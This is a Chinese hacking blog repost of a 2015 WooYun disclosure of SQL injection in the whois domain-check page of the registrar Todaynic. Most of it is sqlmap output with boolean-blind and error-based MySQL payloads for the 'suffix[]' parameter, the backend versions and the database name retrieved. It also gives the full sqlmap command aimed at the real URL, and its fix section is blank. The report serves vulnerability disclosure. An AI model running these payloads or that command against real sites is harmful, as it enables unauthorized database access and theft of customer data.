记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

域名商安全之时代互联主站SQL注入一枚

2015-08-15 01:00

code 区域
ST parameter 'suffix[]' is vulnerable. Do you want to keep testing the others y

sqlmap identified the following injection points with a total of 733 HTTP(s) requests:

---

Parameter: suffix[] (POST)

Type: boolean-based blind

Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause

Payload: query=angelina&suffix[]=.cn' RLIKE (SELECT (CASE WHEN (3859=3859) THEN 0x2e636e ELSE 0x28 END)) AND 'obeI'='obeI



Type: error-based

Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)

Payload: query=angelina&suffix[]=.cn' AND EXTRACTVALUE(4567,CONCAT(0x5c,0x716b6a6b71,(SELECT (ELT(4567=4567,1))),0x717a7a7171)) AND 'VUxD'='VUxD

---

[10:17:38] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.29, PHP 5.5.23

back-end DBMS: MySQL 5.1

[10:17:38] [INFO] fetching database names

[10:17:38] [WARNING] the SQL query provided does not return any output

[10:17:38] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[10:17:38] [INFO] fetching number of databases

[10:17:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[10:17:38] [INFO] retrieved:

[10:17:39] [ERROR] unable to retrieve the number of databases

[10:17:39] [INFO] falling back to current database

[10:17:39] [INFO] fetching current database

[10:17:39] [INFO] retrieved: db_now_net_cn

available databases [1]:

[*] db_now_net_cn

漏洞证明:

code 区域
./sqlmap.py -u "http://en.todaynic.com:80/whois/domaincheck.php" --data="query=angelina&suffix%5B%5D=.cn" --dbs

084FF1C4-0557-4A2A-9A74-9D92516DE159.png





域名不一样,但是裤子是主站数据库````

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2015-0132989

阅读:110005 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“域名商安全之时代互联主站SQL注入一枚”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词